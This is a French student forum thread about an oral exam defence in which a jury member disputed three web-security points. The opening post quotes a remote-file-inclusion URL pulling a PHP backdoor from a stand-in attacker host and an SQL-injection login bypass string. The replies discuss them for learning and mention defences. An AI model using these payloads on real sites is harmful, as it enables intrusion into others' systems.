Gérer le forum:  Aide  •  Rechercher  •  Liste des Membres  •  Groupes d'utilisateurs   •  S'enregistrer  •  Profil  •  Se connecter pour vérifier ses messages privés  •  Connexion 
 Les professionnels faisant passer les soutenances ! Voir le sujet suivant
Voir le sujet précédent
Poster un nouveau sujetRépondre au sujet
Auteur Message
zepgm
Newbiiiie
Newbiiiie




Messages: 7

MessagePosté le: Jeu 03 Juin 2010 - 17:41 Répondre en citantRevenir en haut

Bonjour à tous ! Je m'adresse plus particulièrement aux amateurs/professionnels de la sécurité informatique.
J'ai passé ma soutenance, il y avait bien un "professionnel", un prof d'info et un prof de français, normal !

Voilà, j'ai présenté un sujet et dedans j'avais une partie sur la sécurité web :

Le "professionnel" (oui entre guillemets j'insiste bien) m'a sortit les "affirmations" suivantes :

1) Un .htaccess est détournable grâce à la méthode brute-force
2) Concernant la faille Include(), on ne peut inclure une backdoor en Php étant stocké sur un autre serveur, du genre http://victime.com/index.php?page=http://attacker.com/r57sh.php
3) La requête SQL sur PhpMyAdmin suivante ne fonctionne pas "SELECT * FROM Users WHERE LoginUser = '' OR 1=1 # AND PassUser = '$password'"
car il manque un point-virgule.


1) La méthode brute-force ça existe encore ? Sans compter que pour se faire repérer c'est le meilleur moyen.

2) La faille include , certes vieille mais elle existe encore, permet bien d'inclure une backdoor stockée sur un autre serveur !

3) Je viens de tester encore à l'instant la requête sous PhpMyAdmin sans le ";" et cela fonctionne niquel.

Je ne suis pas un pro de la sécurité web, je connais juste quelque bases, rassurez-moi, ce "professionnel" est complètement obsolète ? Merci de votre attention envers ce post !
Voir le profil de l'utilisateurEnvoyer un message privé

N'oubliez pas de vous inscrire à la communauté pour participer. Si vous êtes déjà membre, connectez-vous pour faire disparaître ce bandeau publicitaire.
Vincent
Webmaster
Webmaster


Post-BTS
Sexe: Sexe:Masculin
Messages: 5584
Localisation: Montpellier

MessagePosté le: Jeu 03 Juin 2010 - 17:55 Répondre en citantRevenir en haut

1) La méthode de brute-force, certes est ancestrale, mais vu qu'elle fonctionne, pourquoi s'en priver ? D'où l'intérêt de mettre des mots de passe complexes, pour que justement, le temps qu'une personne le trouve, on se soit rendu compte qu'on est en train de tenter de se loguer frauduleusement

2) La faille include(), là j'ai envie de dire que ca dépend surtout du code qu'il y a dans la page. Si par exemple dans le code source, le codeur est assez con pour passer en paramètre l'url du fichier à "inclure", oui, ça fonctionnera.

3) Je pense que là il chipote un peu. En fait dans la norme SQL, on mets le ; pour exécuter la requête. Donc en l'état, celle-ci ne serait pas exécutée, mais c'est tout.
Après tout dépend de l'interpréteur SQL et en l'occurrence pour PhpMyAdmin, le fait de cliquer sur le bouton "Exécuter" rajoute en quelque sorte le ;
Donc dire que ca ne fonctionne pas et que la requête est fausse, c'est un peu exagéré.

_________________
Hey les amis, pensez à suivre @webig sur Twitter, et pourquoi pas me suivre moi @cybervince Wink
Voir le profil de l'utilisateurEnvoyer un message privéVisiter le site web du posteurMSN MessengerNuméro ICQ
zepgm
Newbiiiie
Newbiiiie




Messages: 7

MessagePosté le: Jeu 03 Juin 2010 - 17:59 Répondre en citantRevenir en haut

Haaaa merci Vincent ! Ok pour le .htaccess, c'est sûre il faut un bon mot de passe ^^

Pour la faille Include, j'ai présenté un code non sécurisé et sécurisé pour montrer les différences et comment s'en protéger, mais pour lui ce n'est pas possible.

Pour l'injection, j'ai bien dis mots pour mots "cette requête est exécutée à partir de PhpMyAdmin donc le ";" est facultatif" donc oui il a chipoté :/ surtout que j'ai aussi fait du SQL en mode lignes de commandes, donc là oui le ";" est obligatoire.

Par contre ma note ... le prof d'info ne s'est pas prononcé du début à la fin et le prof de français n'a pas pu en placer une !
Voir le profil de l'utilisateurEnvoyer un message privé
Ouarf
Forumeur fréquent
Forumeur fréquent


Post-BTS

Messages: 73

MessagePosté le: Mar 08 Juin 2010 - 16:22 Répondre en citantRevenir en haut

Citation:
Par contre ma note ... le prof d'info ne s'est pas prononcé du début à la fin et le prof de français n'a pas pu en placer une !


Bwarf, tu n'auras pas une mauvaise note pour autant :]

Lors de ma soutenance de BTS, j'ai présenté un projet un peu compliqué (du Java, une application utilisable seulement avec un ERP). La prof de français était totalement larguée, elle n'a pas manqué de faire la remarque à sa collègue. Il n'empêche, j'ai eu 18 Very Happy. La prof d'info était enthousiasmée, je connaissais plutôt bien le sujet, il faut dire. Bref.

C'est peut-être une bonne chose, au final, que le professionnel ait chipoté : ça sous-entend peut-être qu'à part ces maigres détails, il n'a pas pu trouver de faille (hehe) à ton exposé !
Voir le profil de l'utilisateurEnvoyer un message privé
zepgm
Newbiiiie
Newbiiiie




Messages: 7

MessagePosté le: Mar 08 Juin 2010 - 17:26 Répondre en citantRevenir en haut

Merci Ouarf pour ta réponse, bah je pense que c'est bon signe, un prof (qui est jury aussi) m'a dit qu'au contraire ça leur a plu mais sans m'en dire +, après un autre de ma section qui est 1er et qui avait un sujet béton s'est fait exploser aussi :/ Bon signe ? j'espère ouais lol en tout cas 18 bravo ^^ ça fait pas mal de points coeff 4 !
Voir le profil de l'utilisateurEnvoyer un message privé
Montrer les messages depuis:      
Poster un nouveau sujetRépondre au sujet
 Sauter vers:   



Voir le sujet suivant
Voir le sujet précédent
Vous ne pouvez pas poster de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum